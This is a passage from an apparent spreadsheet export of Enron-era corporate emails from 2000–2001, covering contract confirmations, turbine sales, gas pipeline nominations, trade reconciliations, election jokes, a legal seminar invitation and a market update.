Products, prices, terms, conditions, or offers may change at any time. _x000D_
Company and/or product names are generally trademarks, or registered _x000D_
trademarks of their respective companies. Some promotional text may be _x000D_
copyrighted by the product's manufacturer.?_x000D_
_x000D_
_x000D_
 The Original Advantage promotional email is delivered only to customers of _x000D_
PROVANTAGE Corporation. PROVANTAGE customers have purchased products in the _x000D_
past and submitted their email address as part of the checkout process. Or, _x000D_
customers have entered their name in the "Add to Email List" box on the _x000D_
PROVANTAGE.com home page. Any customer may unsubscribe from the list at any _x000D_
time by going to http://www.provantage.com/unsubscribe.htm. The email address _x000D_
is permanently removed from additional promotional electronic mailings, and _x000D_
will not be reactivated unless requested by the customer.??  _x000D_
_x000D_
_x000D_
_x000D_
 [IMAGE] _x000D_
_x000D_
BizRate Customer Certified (GOLD) Site  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 00:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Crestar Document</t>
  </si>
  <si>
    <t xml:space="preserve">Barry Tycholiz says that the attached is in final form and should be Raised _x000D_
directly with Crestar in the final state and send  to them.  Assuming they _x000D_
have no problem with the paper.... we should be done on the monthly firm deal._x000D_
_x000D_
Therefore, please issue this negotiated GTC confirm on ENA stationary.  Stacy _x000D_
Dickson has been working with Barry on this and I made the last changes which _x000D_
had been negotiated.  Call if you have any questions?_x000D_
----- Forwarded by Dan J Hyvl/HOU/ECT on 11/07/2000 08:49 AM -----_x000D_
_x000D_
	Dan J Hyvl_x000D_
	11/06/2000 01:15 PM_x000D_
		_x000D_
		 To: Barry Tycholiz/CAL/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Crestar Document_x000D_
_x000D_
Barry,_x000D_
 The attached document appears to be in final form.  It is ready to be put on _x000D_
ENA stationary and sent to Crestar.  If you are going to do this please send _x000D_
me a hard copy of what is sent out.  As written, the document does not need _x000D_
to be signed by either party.  If you want the ENA confirm desk to send it _x000D_
out, please let me know and I will forward it to them to send, however, in _x000D_
each case, the document will not need to be signed by either party.  Please _x000D_
advise._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 02:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jennifer.bagwell@enron.com', 'chris.walker@enron.com'})</t>
  </si>
  <si>
    <t>Regional Origination</t>
  </si>
  <si>
    <t xml:space="preserve">Will you two please get this info to Dutch.  Thanks._x000D_
_x000D_
DG_x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 11/02/2000 _x000D_
10:01 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Dutch Quigley                           11/02/2000 01:40 AM_x000D_
	_x000D_
_x000D_
To: William Kelly/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, David _x000D_
Baumbach/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Regional Origination_x000D_
_x000D_
Can each person supply me with the originators for their  region._x000D_
_x000D_
Thank you_x000D_
_x000D_
Dutch_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 04:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hfl@fp.edu'})</t>
  </si>
  <si>
    <t>RE: NG Lockdown</t>
  </si>
  <si>
    <t>last week was ubeliveable and in two days it is all gone_x000D_
 _x000D_
_x000D_
my bonus will suck</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 02:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ABILITY TO SELL GE LM6000</t>
  </si>
  <si>
    <t xml:space="preserve">Will do._x000D_
_x000D_
_x000D_
From: Barbara N Gray@ECT on 10/25/2000 06:03 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Jeffrey T Hodge/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: ABILITY TO SELL GE LM6000  _x000D_
_x000D_
please call Dwight Beech @33934 and advise him of your time schedule and _x000D_
expertise.....      and your commitment to prepare these matters for _x000D_
him..........it is my understanding that in the non-binding letter of intent _x000D_
he wants to get a commitment that the counterparty will not deal with anyone _x000D_
else for a period of time.......i don't have any more details than that...he _x000D_
also stated that Ben Jacoby has a "redacted version of the GE AGREEMENT" that _x000D_
he wants to send out.....since I have no knowledge of the GE Agreement, any _x000D_
confidentiality provisions therein or elsewhere or of any past practices in _x000D_
this regard, I hesitate.to express an opinion on this.._x000D_
_x000D_
I am sorry to hear of you and your son's strep conditions; I hope that you _x000D_
received medication to alleviate the symptons._x000D_
If  Dwight needs something this week please  call Shonnie at31463 ; she can _x000D_
help meet the needs while you are out......with your expertise on the GE _x000D_
matters..........................Jeff is not in today and I will be out of _x000D_
the office from 11:oo on tommorrow and all day Friday  (V&amp;E TRIPLE LUTZ _x000D_
negotiation) but will be checking voice mail._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	10/25/2000 03:20 PM_x000D_
		_x000D_
		 To: Barbara N Gray/HOU/ECT@ECT_x000D_
		 cc: Jeffrey T Hodge/HOU/ECT@ECT_x000D_
		 Subject: Re: ABILITY TO SELL GE LM6000_x000D_
_x000D_
I'll be glad to handle it so long as it doesn't have to be done this week, as _x000D_
I have strep throat (Michael and I got a group rate at the peditricians' _x000D_
office.)  _x000D_
Who should I contact?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Barbara N Gray@ECT on 10/25/2000 02:44 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Jeffrey T Hodge/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: ABILITY TO SELL GE LM6000  _x000D_
_x000D_
do you the time to handle the CA and basic term sheet_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	10/25/2000 02:21 PM_x000D_
		_x000D_
		 To: Barbara N Gray/HOU/ECT@ECT_x000D_
		 cc: Jeffrey T Hodge/HOU/ECT@ECT_x000D_
		 Subject: Re: ABILITY TO SELL GE LM6000_x000D_
_x000D_
Hi Barbara,_x000D_
_x000D_
I'm on the phone with the GE folks right now, as we have a standing _x000D_
conference call with them every Wednesday at 130.  I'm familiar with the _x000D_
people and the contractual terms at issue, and will be happy to discuss it._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Barbara N Gray@ECT on 10/25/2000 11:38 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Jeffrey T Hodge/HOU/ECT@ECT _x000D_
_x000D_
Subject: ABILITY TO SELL GE LM6000  _x000D_
_x000D_
Kay I received a call from Dwight Beech,who used to do powere-type work....he _x000D_
is now in a different group.  While in that group he formed a relationship _x000D_
with individuals at Jones Capital Corp. They have somehow discovered that _x000D_
Enron has the above mentioned turbines and they wish to purchase 2 or _x000D_
more......I understand from Dwight that there are restrictions which affect _x000D_
ENA's right to sell the turbines to 3rd parties and that there may be ways to _x000D_
structure around these._x000D_
_x000D_
Please call so that we may discuss Ben Jacoby has been speaking with Dwight _x000D_
and wants a basic term sheet AND a confidentiality Agreement.   bng    I _x000D_
presume from our discussions you are familiar with the GE issues._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Aug 2001 07:46:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.walton@enron.com', 'm..landwehr@enron.com', 'luiz.maurer@enron.com', 'joan.stransky@enron.com', 'robert.neustaedter@enron.com', 'tom.hoatson@enron.com', 'michael.roan@enron.com', 'lisa.yoho@enron.com', 'frank.rishe@enron.com', 'marchris.robinson@enron.com', 'paul.kaufman@enron.com', 'vinio.floris@enron.com', 'thane.twiggs@enron.com', 'guillermo.canovas@enron.com', 'scott.bolton@enron.com', 'a..hueter@enron.com', 'kathleen.sullivan@enron.com', 'harry.kingerski@enron.com', 'robert.frank@enron.com', 'jerry.boston@enron.com', 'gloria.ogenyi@enron.com', 'maria.arefieva@enron.com', 'alberto.levy@enron.com', 'allison.hamilton@enron.com', 'lysa.tracy@enron.com', 'roy.boston@enron.com', 'joe.connor@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'stella.chan@enron.com', 'bevin.hunter@enron.com', 'john.shelk@enron.com', 'j..kean@enron.com', 'carmen.perez@enron.com', 'bill.moore@enron.com', 'eric.benson@enron.com', 'carin.nersesian@enron.com', 'steve.montovano@enron.com', 'scott.reblitz@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'kirsten.bellas@enron.com', 'helen.rizzo@enron.com', 'aleck.dadson@enron.com', 'karen.huang@enron.com', 'jean.dressler@enron.com', 'lisa.assaf@enron.com', 'darran.binns@enron.com', 'kikumi.kishigami@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@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susan.lindberg@enron.com', 'joe.allen@enron.com', 'lara.leibman@enron.com', 'nancy.hetrick@enron.com', 'daniel.allegretti@enron.com', 'l..petrochko@enron.com', 'fino.tiberi@enron.com', 'janel.guerrero@enron.com', 'carolyn.cooney@enron.com', 'maureen.mcvicker@enron.com', 'germain.palmer@enron.com', 'richard.ingersoll@enron.com', 'tom.briggs@enron.com', 'amr.ibrahim@enron.com', 'terri.miller@enron.com', 'robert.hemstock@enron.com', 'donna.fulton@enron.com', 'w..cantrell@enron.com', 'sam.leonardo@enron.com', 'lindsay.meade@enron.com', 'dave.perrino@enron.com', 'andy.rodriquez@enron.com', 'dan.staines@enron.com', 'lora.sullivan@enron.com', 'margaret.huson@enron.com', 'richard.shapiro@enron.com', 'larry.decker@enron.com', 'jennifer.thome@enron.com', 'joseph.alamo@enron.com', 'd..steffes@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>FW: Dan Staines cell phone #</t>
  </si>
  <si>
    <t>Just FYI!!!!_x000D_
_x000D_
Ginger Dernehl_x000D_
Administrative Coordinator_x000D_
Global Government Affairs_x000D_
Phone# 713-853-7751_x000D_
Fax# 713-646-8160_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bellas, Kirsten  _x000D_
Sent:	Monday, August 27, 2001 8:47 AM_x000D_
To:	Dernehl, Ginger_x000D_
Subject:	Dan Staines cell phone #_x000D_
_x000D_
Ginger,_x000D_
Dan Staines' cell phone number is (908)890-8842 not (732)890-8842.  Could you please send this email out to everyone in our group to let them know of the correction._x000D_
_x000D_
Thank you,_x000D_
Kirsten</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 02:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.woita@fhlbtopeka.com'})</t>
  </si>
  <si>
    <t>frozenset({'maurden@rconnect.com', 'wpatti0205@aol.com', 'jim.schwieger@enron.com', 'christopher.bruner@motorola.com', 'bruners@uswest.net', 'lzzylou8@juno.com', 'sjbruner@worldnet.att.net', 'gjforman@juno.com', 'dmcnemar@juno.com', 'gwlee@mymailstation.com', 'mark.woita@fhlbtopeka.com', 'jjjsmd@aol.com', 'smithki@ms.com', 'mwoita@home.com', 'misterpiccalo@hotmail.com', 'helenswig@aol.com', 'corey-ponder@ouhsc.edu'})</t>
  </si>
  <si>
    <t>FW: more "thoughts" about the election ...</t>
  </si>
  <si>
    <t xml:space="preserve">  :)_x000D_
_x000D_
    I thought all you non-Floridians might like to see the new crop_x000D_
    of bumper stickers floating around Florida these days ..._x000D_
    from those who put the "DUH" in "Floriduh"!_x000D_
_x000D_
_x000D_
    FLORIDA: If you think we can't vote, wait till you see us drive._x000D_
_x000D_
    FLORIDA: We count more than you do._x000D_
_x000D_
    FLORIDA: If you don't like the way we count then take I-95 and_x000D_
    visit one of  the other 56 states._x000D_
_x000D_
    FLORIDA: We've been Gored by the bull of politics and we're_x000D_
    Bushed._x000D_
_x000D_
    FLORIDA: Relax, Retire, Revote._x000D_
_x000D_
    FLORIDA: Where your vote counts and counts and counts._x000D_
_x000D_
    FLORIDA: This is what you get for taking Elian away from us!_x000D_
_x000D_
    FLORIDA: We're number one! Wait! Recount!_x000D_
_x000D_
    Palm Beach County:  If you're nice, we'll let you vote twice._x000D_
_x000D_
    Palm Beach County: We put the "duh" in Florida._x000D_
_x000D_
    Sign on I-95 : Florida this way 2 miles , no, that way  5 miles,_x000D_
    no, wait 10..._x000D_
_x000D_
    Pro-electorate's choice: Abort the pregnant chads._x000D_
_x000D_
    We, the people,  have spoken. Now shut up and listen while the_x000D_
         lawyers tell us what we said._x000D_
_x000D_
    FLORIDA: We can't vote, but you should see us handle 15 bingo_x000D_
    cards!</t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 06:35:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sfink@knowledgeu.com'})</t>
  </si>
  <si>
    <t>_x000D_
You still have my support.  Let me know if I can be helpful in any way.</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 02:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Conference call Availability w/ Harry??</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff - _x000D_
_x000D_
Rubena called to see if you'd be available today for a conference call _x000D_
w/Harry Kingerski re: SCE PX Credit_x000D_
at 2:30 our time/4:30 central._x000D_
_x000D_
Please so advise me your availability -- or preferable time, if need be?? -- _x000D_
ASAP._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Joseph_x000D_
</t>
  </si>
  <si>
    <t>Sun, 24 Dec 2000 00:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>rams -3.5_x000D_
wash -7_x000D_
raiders -9 1/2_x000D_
balt -5_x000D_
bears lions over 37_x000D_
eagles bengals under 35 1/2_x000D_
pats +4_x000D_
vikings +5.5</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 08:30:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cgt_customer_services@nisource.com'})</t>
  </si>
  <si>
    <t>Columbia Reduction for Enron N A</t>
  </si>
  <si>
    <t xml:space="preserve">Company: 002909     Arng: 39229-09253     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                 4,739_x000D_
Working                           0                 4,739_x000D_
Capacity Allocation               0                 4,739_x000D_
Confirmed                         0                 4,735  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10166     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     5,256                     0_x000D_
Working                       5,256                     0_x000D_
Capacity Allocation           5,256                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10167     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     4,054                     0_x000D_
Working                       4,054                     0_x000D_
Capacity Allocation           4,054                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10168     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     5,000                     0_x000D_
Working                       5,000                     0_x000D_
Capacity Allocation           5,000                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10169     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     7,500                     0_x000D_
Working                       7,500                     0_x000D_
Capacity Allocation           7,500                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10171     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    10,000                     0_x000D_
Working                      10,000                     0_x000D_
Capacity Allocation          10,000                     0_x000D_
Confirmed                         1  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10230     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                   274_x000D_
Working                           0                   274_x000D_
Capacity Allocation               0                   274_x000D_
Confirmed                         0                     0  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10261     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                 1,100_x000D_
Working                           0                 1,100_x000D_
Capacity Allocation               0                 1,100_x000D_
Confirmed                         0                     0  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10283     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    10,000                     0_x000D_
Working                      10,000                     0_x000D_
Capacity Allocation          10,000                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10291     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       600                     0_x000D_
Working                         600                     0_x000D_
Capacity Allocation             600                     0_x000D_
Confirmed                       300  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10300     Eff Date: 2001-06-02_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                 7,404_x000D_
Working                           0                 7,404_x000D_
Capacity Allocation               0                 7,404_x000D_
Confirmed                         0                     0  CBL_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 09:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rudi.zipter@enron.com'})</t>
  </si>
  <si>
    <t>Re: Congratulations</t>
  </si>
  <si>
    <t xml:space="preserve">...because I'm good enough, I'm smart enough and dog-gonnit people like me._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Susan M Scott/HOU/ECT@ECT, Chris Abel/HOU/ECT@ECT, Gary _x000D_
Stadler/HOU/ECT@ECT, Tobin Carlson/HOU/ECT@ECT_x000D_
cc: Michael E Moscoso/HOU/ECT@ECT _x000D_
Subject: Congratulations_x000D_
_x000D_
All,_x000D_
_x000D_
Thanks for all your help the other week ... the article in the e-mail below _x000D_
highlights the effect on Enron!!!!_x000D_
_x000D_
RZ_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rudi Zipter/HOU/ECT on 03/26/2000 12:31 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Andrew Champion_x000D_
03/27/2000 12:20 PM_x000D_
To: Rudi Zipter/HOU/ECT@ECT_x000D_
cc: Ganapathy Ramesh/HOU/ECT@ECT _x000D_
Subject: Congratulations_x000D_
_x000D_
We passed... check out this article - Ramesh pointed it out to me:_x000D_
_x000D_
http://biz.yahoo.com/rf/000323/sc.html_x000D_
_x000D_
"Moody's raises Enron Corp long-term debt..."_x000D_
_x000D_
"...Stress testing and VAR calculations in the Wholesale business are _x000D_
consistent on a relative scale with other commodities trading firms..."_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 02:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'davila1@txu.com', 'ggreen2@txu.com', 'cstone1@txu.com', 'gary.a.hanks@enron.com', 'liz.bellamy@enron.com', 'daren.j.farmer@enron.com', 'rskerik1@txu.com', 'earl.tisdale@enron.com', 'carlos.j.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Enron / HPL Actuals for December 19, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Teco Tap       25.000 / Enron; 100.000 / HPL Gas Daily_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Sep 2001 11:06:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wyndi_workman-rodriguez@pgn.com'})</t>
  </si>
  <si>
    <t>RE: April &amp; May 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Done and corrected for both April and May.  Sales and Purchases match._x000D_
_x000D_
ds_x000D_
_x000D_
-----Original Message-----_x000D_
From: WYNDI Workman-Rodriguez [mailto:Wyndi_Workman-Rodriguez@pgn.com]_x000D_
Sent: Tuesday, September 04, 2001 11:49 AM_x000D_
To: DScholt@enron.com; wiz.ixgate:Virginia.Thompson@ENRON.com_x000D_
Cc: Anne Snyder; BILL CASEY; Shari Johnson_x000D_
Subject: April &amp; May 2001_x000D_
_x000D_
_x000D_
APRIL 2001_x000D_
_x000D_
4/2:  Both sides - We show (as well as EPMI presched sheet), 8 mw LLH.  However, the report just reflects HE 1-6, not HE 23 &amp; 24._x000D_
Day Totals =   PGE Sales:  $590,754.08    PGE Purchases:  $586,998.56_x000D_
_x000D_
4/5:  Deal #570138.1 - Change index from "DJ-MC-NF", should be OFF_x000D_
Day Total =  PGE Sales $716,918.88._x000D_
_x000D_
April Totals:_x000D_
PGE Sales:    $16,586,250.34_x000D_
PGE Purchases:   $16,473,134.54_x000D_
_x000D_
MAY 2001_x000D_
_x000D_
5/4:  Deal #601936.1 - change index fr "DJ-MC-NF-OFF", should be OFF._x000D_
Day Total = PGE Sales $205,201.92_x000D_
_x000D_
5/21:  Deal #615663.1 - change index fr "DJ-MC-Index", should be OFF._x000D_
Day Total = PGE Sales $897,920.96_x000D_
_x000D_
5/25 &amp; 26:  Deal #619738.1 - our purch should not have any adders.  EPMI shows $0.10 adder, which needs to be removed._x000D_
5/25 Day Total = PGE Purch   $1,037,908.64_x000D_
5/26 Day Total = PGE Purch   $1,037,944.80_x000D_
_x000D_
May Totals:_x000D_
PGE Sales:    $22,210,898.32_x000D_
PGE Purchases:   $22,148,805.36_x000D_
_x000D_
I will try to get June to you tomorrow.  I'm still looking forward to hearing from you regarding December 2000._x000D_
_x000D_
Thanks !_x000D_
Wyndi_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 03:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: PG&amp;E Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks.  Was aware of the power/gas split, but FYI, Chris Foster on the _x000D_
Portland desk is a great source of information--Midmarket electricity trader _x000D_
and a very straightforward guy._x000D_
_x000D_
_x000D_
_x000D_
	Karen Denne_x000D_
	01/02/2001 11:40 AM_x000D_
		_x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Re: PG&amp;E Gas_x000D_
_x000D_
Apparently their credit limit has not been reached.  They haven't been doing _x000D_
any deals, but because PG&amp;E hasn't been online.  I didn't realize that the _x000D_
Portland office only does power sales.  Gas desk is in Houston.  I'll let you _x000D_
know if I find out anything more._x000D_
_x000D_
_x000D_
From: Jeff Dasovich on 01/02/2001 11:29 AM_x000D_
Sent by: Jeff Dasovich_x000D_
To: Karen Denne/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: PG&amp;E Gas  _x000D_
_x000D_
Thanks.  I was literally just about to call the Portland desk.  You saved me _x000D_
the trouble.  Did they say whether they have any plans to cut PG&amp;E off (from _x000D_
gas sales) in the near future?_x000D_
_x000D_
_x000D_
_x000D_
	Karen Denne_x000D_
	01/02/2001 11:26 AM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: PG&amp;E Gas_x000D_
_x000D_
FYI, Mark just walked down to the trading floor, and we have not stopped _x000D_
selling to PG&amp;E.  Apparently, the ISO put out another list and we're on it. kd_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 09:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Beau Canada</t>
  </si>
  <si>
    <t xml:space="preserve">Roger that - book 'em Dano._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 10/27/2000 _x000D_
04:37 PM ---------------------------_x000D_
_x000D_
_x000D_
Rob Milnthorp_x000D_
10/27/2000 12:06 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: William S Bradford/HOU/ECT@ECT, Kyle Kitagawa/CAL/ECT@ECT, Derek _x000D_
Davies/CAL/ECT@ECT _x000D_
Subject: Beau Canada_x000D_
_x000D_
Dave, I had a call from Bradford today and he has Buy's sign-off on _x000D_
recognizing U.S. $1.1MM credit exposure reduction as a result of our efforts _x000D_
on securing a 3rd charge on Beau's assets (additionally, the 3rd charge _x000D_
follows the assets with the Murphy credit upgrade). It is important to _x000D_
continue to send originators the right signals re credit mitigation and _x000D_
therefore I feel it is imperative that we grant the $1.1MM as origination to _x000D_
reward those efforts._x000D_
_x000D_
Please advise that you are in agreement, and we will book asap. _x000D_
_x000D_
Regards_x000D_
Milnthorp_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 12:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Economic Espionage Act Presentation - August 15th</t>
  </si>
  <si>
    <t xml:space="preserve">calendar -- FYI_x000D_
---------------------- Forwarded by Steven J Kean/HOU/EES on 08/03/2000 07:15 _x000D_
PM ---------------------------_x000D_
_x000D_
Scott Tholan@ECT_x000D_
08/01/2000 04:49 PM_x000D_
_x000D_
_x000D_
Sent by: Sharon Purswell@ECT_x000D_
To: John J Lavorato/Corp/Enron@Enron, Jeffrey A Shankman/HOU/ECT@ECT, Vince J _x000D_
Kaminski/HOU/ECT@ECT, Greg Whalley/HOU/ECT@ECT, Steven J Kean/HOU/EES@EES, _x000D_
Jim Fallon/Enron Communications@Enron Communications, Russell Woody/Enron _x000D_
Communications@Enron Communications, John Brindle, David Oxley/HOU/ECT@ECT_x000D_
cc: Alan Aronowitz/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT _x000D_
Subject: Economic Espionage Act Presentation - August 15th_x000D_
_x000D_
_x000D_
You are cordially invited to attend a presentation entitled:  "Acquiring _x000D_
Information: Trade Secrets and the Economic Espionage Act (EEA)".   Daniel _x000D_
Waltz, of the law firm Patton Boggs LLP, is a leading expert on the EEA and _x000D_
will deliver what promises to be an interesting and informative segment.  _x000D_
Congress passed the EEA in 1996, and it will increasingly shape how corporate _x000D_
America collects, uses, and protects valued information.  In addition to _x000D_
explaining some of the intricacies of the EEA, Dan Waltz will include _x000D_
"hypothetical" corporate case studies (some actually torn from the headlines) _x000D_
to illustrate his points._x000D_
_x000D_
This event is sponsored by ENA's Competitive Analysis and Business Controls _x000D_
(CABC) group and is supported by ENA legal.   This event kicks-off CABC's _x000D_
Competitive Intelligence Standards Program, which seeks to raise awareness of _x000D_
issues relevant both to Enron's practitioners and senior consumers of _x000D_
competitive intelligence.  This particular speaking engagement is designed to _x000D_
raise awareness of the EEA's legal guidelines, as well as to stimulate _x000D_
thought both on the collection opportunities against our competitors as well _x000D_
as how we might better protect Enron's own proprietary information.   I _x000D_
believe the topic of the EEA is especially relevant, given that we find _x000D_
ourselves amidst the big bang of this new information age.  _x000D_
_x000D_
All CABC staff is being asked to attend this presentation, and we are _x000D_
inviting a small number of other Enron employees who are engaged in aspects _x000D_
of serious competitive intelligence.  Select executives like yourselves are _x000D_
being invited to attend, and I would welcome any suggestions of others that _x000D_
you think might benefit from attending this event.  _x000D_
_x000D_
The EEA presentation is set for August 15, 1:30-3:00 PM, in the 50th floor _x000D_
Conference room.  Please RSVP to either myself or Sharon Purswell.  Hope to _x000D_
see you there._x000D_
_x000D_
_x000D_
 _x000D_
P.S.  By the way, our next speaker segment in the CI Standards Program will _x000D_
concentrate on the guidelines and implications of the "Foreign Corrupt _x000D_
Practices Act (FCPA)," and will likely be scheduled for the fall._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 04:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'schwabalerts.marketupdates@schwab.com'})</t>
  </si>
  <si>
    <t>Midday Market View for June 5, 2001</t>
  </si>
  <si>
    <t>Charles Schwab &amp; Co., Inc._x000D_
_x000D_
Midday Market View(TM) for Tuesday, June 5, 2001_x000D_
as of 1:00PM EDT_x000D_
Information provided by Standard &amp; Poor's_x000D_
_x000D_
================================================================_x000D_
_x000D_
U.S. INDICES_x000D_
(1:00p.m. EDT)_x000D_
_x000D_
----------------------------------_x000D_
Market            Value     Change_x000D_
_x000D_
DJIA          11,148.70    + 87.20_x000D_
Nasdaq Comp.   2,225.17    + 69.24_x000D_
S&amp;P 500        1,280.06    + 12.95_x000D_
----------------------------------_x000D_
NYSE Advancing Issues        1,829_x000D_
NYSE Declining Issues        1,141_x000D_
NYSE Trading Volume        616 mln_x000D_
NASDAQ Advancing Issues      2,247_x000D_
NASDAQ Declining Issues      1,275_x000D_
NASDAQ Trading Volume      993 mln_x000D_
_x000D_
==================================_x000D_
_x000D_
U.S. TREASURIES_x000D_
----------------------------------_x000D_
Value            Yield      Change_x000D_
_x000D_
1-year bill       3.57%        n/a_x000D_
